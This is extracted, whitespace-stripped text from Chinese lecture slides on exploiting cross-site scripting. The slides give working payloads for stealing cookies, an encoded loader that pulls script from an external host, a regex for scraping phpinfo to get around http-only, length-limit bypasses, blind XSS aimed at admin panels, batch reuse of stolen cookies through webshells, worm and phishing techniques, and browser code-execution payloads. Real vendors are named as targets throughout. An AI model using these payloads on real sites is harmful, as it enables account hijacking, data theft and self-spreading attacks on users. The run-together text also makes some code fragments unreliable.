XSS利用与挖掘课件

PKAV-EDU《XSS漏洞利用》第3讲BYGAINOVERXSS利用与挖掘XSS利用流程2XSS利用与挖掘用户种类–普通用户含有XSS攻击代码的页面Cookies数据使用cookies数据登录XSS利用与挖掘Helloxss!alert(1)alert(document.cookie)Xsser.mePython

Perl

Php

Anyotherscripts!!XSS利用与挖掘如何发送cookies数据方式一AJAXXMLHttpRequestIEChrome同域请求ActiveXObject("Microsoft.XMLHTTP")ActiveXObject("MSXML2.XMLHTTP")XMLHttpRequest跨域请求XDomainRequestXMLHttpRequestXSS利用与挖掘AJAX数据发送流程vara=window.XMLHttpRequest();a.open("GET","URL?数据",true);a.send(null);open("POST","URL",true);send(数据);r.php跨域Access-Control-Allow-OriginAccess-Control-Allow-MethodsAccess-Control-Allow-Headers跨域请求可以发送数据但不能接受数据数据库邮箱XSS利用与挖掘如何发送cookies数据方式二<formid="x"action="POST地址"> <inputtype="hidden"value="数据"name="c"/></form><script> //提交表单 document.getElementById("x").submit();</script>XSS利用与挖掘如何发送cookies数据方式三varx=newImage();x.src="URL?数据";XSS利用与挖掘如何调用外部JS文件除了获取cookies，我们通常还需要做其它邪恶的事情～～获取用户资料获取当前页面内容传播消息–导致蠕虫JS小段代码调用XSS插入我们需要执行的一系列操作XSS利用与挖掘调用外部JS文件的方法<scriptsrc="JS地址"></script>静态创建动态创建<script>vars=document.createElement("script");s.src="JS地址";(document.body||document.documentElement).appendChild(s);</script>jsBodyXSS利用与挖掘调用外部JS文件的方法变形图片方式调用外部JS<imgstyle=display:nonesrc=1onerror='vars=document.createElement("script");s.src="";(document.body||document.documentElement).appendChild(s);'/>alert(1)

调用外部JSeval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,115,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,116,46,115,105,110,97,97,112,112,46,99,111,109,47,109,46,106,115,34,59,40,100,111,99,117,109,101,110,116,46,98,111,100,121,124,124,100,111,99,117,109,101,110,116,46,100,111,99,117,109,101,110,116,69,108,101,109,101,110,116,41,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59));Flash方式调用外部JS<embedsrc=""allowscriptaccess="always">XSS利用与挖掘调用外部JS文件–借刀杀人$.getScript主公救我！jQuery君企鹅君XSS利用与挖掘如何查找网页中可以用于调用外部JS的函数newQZFL.jsLoader().load("//")小福利，见附件中：invoke.listfunctions.txtXSS利用与挖掘一个DOMXSS的完整利用代码编写过程alert(1);//%3E&singertype=othe"eval(String.fromCharCode(118,97,))"%20/%3E&singertype=othealert(1)

调用外部JSalert(1)iframe到攻击页面中<iframe/src='"><imgstyle=display:nonesrc=1onerror="eval(String.fromCharCode(118,97,...))"/>&singertype=othe'style="display:none"></iframe>14XSS利用与挖掘拿到Cookies数据后怎么使用？实例演示XSS利用与挖掘批量利用Cookies数据qq.plgainover./qq.txtnoproxy一大波Cookies!脚本一大波请求找代理分发给WEBSHELL16XSS利用与挖掘XSS利用过程中会遇到的问题XSS利用与挖掘什么是http-only？什么是Http-only!boolsetcookie(stringname[,stringvalue[,intexpire[,stringpath[,stringdomain[,boolsecure[,boolhttponly]]]]]])PHP5.2.0intsetcookie(stringname,stringvalue,intexpire,stringpath,stringdomain,intsecure);PHP<5.2.0WhenTRUEthecookiewillbemadeaccessibleonlythroughtheHTTPprotocol.Thismeansthatthecookiewon'tbeaccessiblebyscriptinglanguages,suchasJavaScript.只能用于传输，而不能被脚本获取XSS利用与挖掘如何查看Cookies是否有http-only？对比抓包得到的Cookies数据与document.cookie!document.cookie.split(";").join("\n")抓包工具抓取的cookiesXSS利用与挖掘如何查看Cookies是否有http-only？壮哉我大Chrome调试工具！！XSS利用与挖掘突破http-only的方法方式一、HTTPTrace(CROSS-SITE TRACING,XST)IE6时代的http-only绕过技术古为今用！插件：Siverlight–Flash-Java21XSS利用与挖掘突破http-only的方法方式二、探针文件（phpinfo.php）(function(){varx=newXMLHttpRequest();x.open("GET","./9.phpinfo.php",false);x.send(null);varc=x.responseText||"";c=c.match(/<td[^<>]+?>_SERVER\["HTTP_COOKIE"\]<\/td><td[^<>]+?>([\w\W]+?)<\/td>/)||["",""];console.log(c[1]);})()22XSS利用与挖掘突破http-only的方法方式三、WEB服务器漏洞–Apache<2.2.22(CVE-2012-0053)23XSS利用与挖掘突破Http-only的实际应用新浪微博COOKIES盗取淘宝网COOKIES盗取腾讯某论坛XSS攻击，获取httponlyPKAV10.apache.400XSS利用与挖掘攻击利用长度限制关键时候！

长度不够怎么办？专治各种不孕不育？小药丸？尼玛！我说的是利用代码太长，输入点长度不够！25XSS利用与挖掘三个臭皮匠，顶个诸葛亮！<imgtitle="图片描述"></img><imgtitle="图片描述"></img><imgtitle="图片描述"></img>……15个选项20个字符<imgtitle=""onload="alert(1)"></img>17个字符<imgtitle=""><script>/*"></img><imgtitle="*/alert(1)/*"></img><imgtitle="*/</script>"></img><imgtitle=""><script>/*"></img><imgtitle="*/alert(1)/*"></img><imgtitle="*/</script>"></img>XSS利用与挖掘借尸还魂！<imgalt="图片名称"></img>"onload="alert(1)30个字符"onload="9个字符JS代码

21个字符真装不下了！！27XSS利用与挖掘借尸还魂！<imgsrc=""title=""r="a($('s').r+$('r').r)"id="t"></img>

<imgsrc=""title=""r="QZFL.imports('//xsst"id="s"></img>

<imgsrc=""title=""r=".)"id="r"></img>

<imgsrc=""title=""onload="a=eval;a($('t').r)"></img>模型一模型二<imgsrc=""title="eval(g_userPro)"id="t"></img>

<imgsrc=""title=""onload="eval($('t').title)"></img>27个字符30个字符g_userProQZFL.imports('//)28XSS利用与挖掘借尸还魂！*哪些尸体可以借？';eval(qUserInfo.spaceName)//<--可控的JS变量

';eval(M.innerHTML)//<--21个长度

';eval(M.title)//<--17个长度

';eva)//<--16个长度

';eval(M.alt)//<--15个长度

';eval(M.src)//<--15个长度<标签id=Mtitle=xxxxxxxxname=xxxxxxxalt=xxxxxxxxxsrc=xxxxxxxx>xxxxxxxx</标签>29XSS利用与挖掘注意https与http！注意在https页面中调用http的JS文件，会被浏览器拦截这一问题！支持https的，比如GAE（*.,各种被墙中….）测试代码见：11.https-http.txtXSS利用与挖掘用户种类–管理员信息入侵控制XSS利用与挖掘BlindXSS(盲打)如何接触管理员？信息收集水坑攻击目标网站交互点传统XSSBlindXSS有QQ的不一定是人，还有可能是禽兽！难度大！XSS利用与挖掘BlindXSS成因金玉其外,败絮其中!开发：只有管理人员使用，何必做的那么完美？页面简陋！毫无过滤XSS利用与挖掘BlindXSS成因姓名：建议：前台(攻击者可见)后台(管理员可见)姓名建议gainover软件标题字太小<imgsrc=1onerror=alert(1)>gainover软件标题字太小攻击者最初是看不见后台是什么样子的！！故而叫盲打！方法：不管3721，见到框框就输入代码！34XSS利用与挖掘BlindXSS代码编写姓名:<span>[输出点]</span>姓名:<inputtype="text"value="[输出点]"> <inputtype="text"value='[输出点]'>3.建议:<textarea>[输出点]</textarea>4.建议:<script>vardata=[{sug:"[输出点]"}];</script>虽然看不见，但是可以想象！<imgstyle=display:noneonerror=with(document.body)appendChild(document.createElement('script')).src=altalt=src=xx:x>"></textarea></script>'(12.bind.xss.exp.txt)XSS利用与挖掘BlindXSS危害-横扫各大厂商！用xss平台沦陷百度投诉中心后台手机feedbackxss盲打金山词霸UED中心(2集连播)雪球网xss盲打后台功能较多的后台各种其它漏洞！某公交集团盲打到获取shellXSS利用与挖掘BlindXSS经常出现的场景意见建议WooYun-2012-09547WooYun-2012-14869注册资料WooYun-2013-18049手机客户端WooYun-2012-12308WooYun-2012-11978文章发布WooYun-2013-22125注册资料WooYun-2013-18049中奖短信XSS利用与挖掘BlindXSS会遇到的问题及解决办法1.Session过期问题！解决办法：KeepSession程序，即利用一个小程序，获取我们所获得的Cookies数据，每隔一段时间访问目标网站页面，防止Session失效！2.Cookies有http-only、后台在内网被隔离、访问IP受限等。解决办法：尝试使用XSS获取后台页面数据，返回本地后进行分析是否存在可以利用的链接，未发现，继续获取子页面内容进行分析。操作繁琐，需要重复使用XSS盲打！猥琐小技巧：后台打不到，可以直接插一个QQ的XSS过去！XSS利用与挖掘蹲管理，收人头！管理员QQ名单被我们修改的首页链接！没事别进草，小心XSS！XSS利用与挖掘蹲管理，收Shell!视频Demo:WordPress3.5xssgetshell开源程序后台存在getshell权限后台存在XSS漏洞(直接)或网站其它存在XSS漏洞(间接)下载：实例演示Demo

Code

@13.wordpress.getshell.htmXSS利用与挖掘攻击方式之定向攻击XSS点对点，XSS直接发挥作用，获取用户信息41XSS利用与挖掘攻击方式之定向攻击微博私信IM客户端邮箱腾讯微博私信存储型XSS百度某IM通讯产品存储型XSS腾讯WEBQQ聊天功能XSS-附带消息蠕虫代码

新浪微博私信处存储型XSSQQ空间礼物功能XSS可以攻击任意指定QQ号码用户腾讯QQ聊天框XSS当|XSS蠕虫|与|QQ系统消息推送|双剑合璧之后…

QQ邮箱XSS，邮件中可调用外部javascript文件QQ邮箱XSS，音乐功能导致邮件加载任意javascriptWooYun:Gmail某处XSS可导致账号持久劫持

XSS利用与挖掘攻击方式之诱骗攻击XSS点对点，XSS不能直接发挥作用clickjackingphishing诱骗的目的：1.让不能自动触发的JS被点击触发 2.获取更为直接的密码信息XSS利用与挖掘XSS+clickjacking(点击劫持)Demo:下一页点我有惊喜哦！44XSS利用与挖掘XSS+Phishing(钓鱼攻击)直接在当前页面动态模拟创建登录窗口2.通过location.href='javascript:\'HTML内容\''的方式重写当前页面内容，浏览器URL保持不变，或者通过设置为假的URL。history.pushState({},"xxx","/cgi-bin/loginpage")XSS利用与挖掘攻击方式之水坑攻击46XSS利用与挖掘如何定义水坑攻击！基本信息收集经常上哪些网站？网站1网站2…..挑出容易被攻陷的网站拿下网站，种下XSS代码直接拿下控制权网站存在存储型XSS烽火戏诸侯,只为博伊人一笑访问网站Cookies数据XSS利用与挖掘水坑攻击实例！从得知李老师会上36kr36kr文章页面使用了denglu.cc的评论插件存储型XSSQQ某DOMXSS蹲！！XSS利用与挖掘攻击方式之XSS后门有一种存储型XSS叫self–xss！翻译成中文：自X！XSS某商城个人资料1提交这个页面只有自己能看到！只能自己X自己。。。XSS利用与挖掘攻击方式之XSS后门XSS某商城个人资料黑客构造页面提交修改资料的请求内含XSS代码受害者点开页面XSSRookit!CSRF反射型XSSXSS利用与挖掘攻击方式之XSS后门实例！受害者Iframe调用(function(){functionj(w){window.s=document.createElement('script');window.s.src='//(window.s)}j('jq');j('wq')})()Flashxsshttp://*/getvfqq.php?cookie={Cookie数据}获取vfwebqq参数设置主题调用外部JS获取cookies劫持WEBQQ持久劫持XSS利用与挖掘攻击方式之XSS后门实例！的某FlashXss。获取token保存一个页面链接含XSS代码XSS后门！百度首页Xss后门-可对用户进行持久劫持XSS利用与挖掘攻击方式之XSS后门经常出现的场景1.商城及类似网站的个人信息页面2.博客，邮箱等程序的设置/配置页面传统的存储型XSS存储在本地的信息所导致的XSScookies/storage/localdatabase第三方插件，例如FLASH的本地存储（

sharedobjcet）--淘宝某处存储型XSS漏洞(WooYun-2013-22080)--当当网：二级域反射XSS变身所有域下存储XSS(WooYun-2013-17527)XSS利用与挖掘XSS蠕虫攻击者受害者系统消息推送点开系统消息自定义页面FLASHXSS偷取COOKIES获取好友列表推送系统消息受害者好友群XSS利用与挖掘XSS蠕虫形成的条件中了XSS以后！获取关系列表发布信息受害者受害者受害者受害者循环！不能有验证码！！获取发布信息所需的参数发布信息XSSXSSXSSXSS利用与挖掘利用XSS进行虚假消息传播！受害者攻击者被XSS后！二级受害者虚假消息！信任56XSS利用与挖掘XSS与浏览器！"><iframename="fuck"src=""onload=alert(fuck.window.eval("Install('ExtWebMail','013','360邮件通','','')"))></iframe>360安全浏览器远程代码执行漏洞360一主程序存在严重漏洞varinfo="apptype=1;appdisplaytype=1;appid=/../../../../../windows/;appname=登录管家;appver=056;iconurl=";external.twExtSendMessage2(external.twGetSecurityID(window),"pluginbar","InstallAppItem","",info);360安全浏览器远程代码执行漏洞XSS利用与挖掘XSS与浏览器浏览器会在特定的域下提供一些高权限操作360允许在下执行高权限操作QQ会允许域名下的代码调用soso工具栏的COM组件浏览器中部分UI也是由网页完成的，这些页面存在XSS导致高权限操作！浏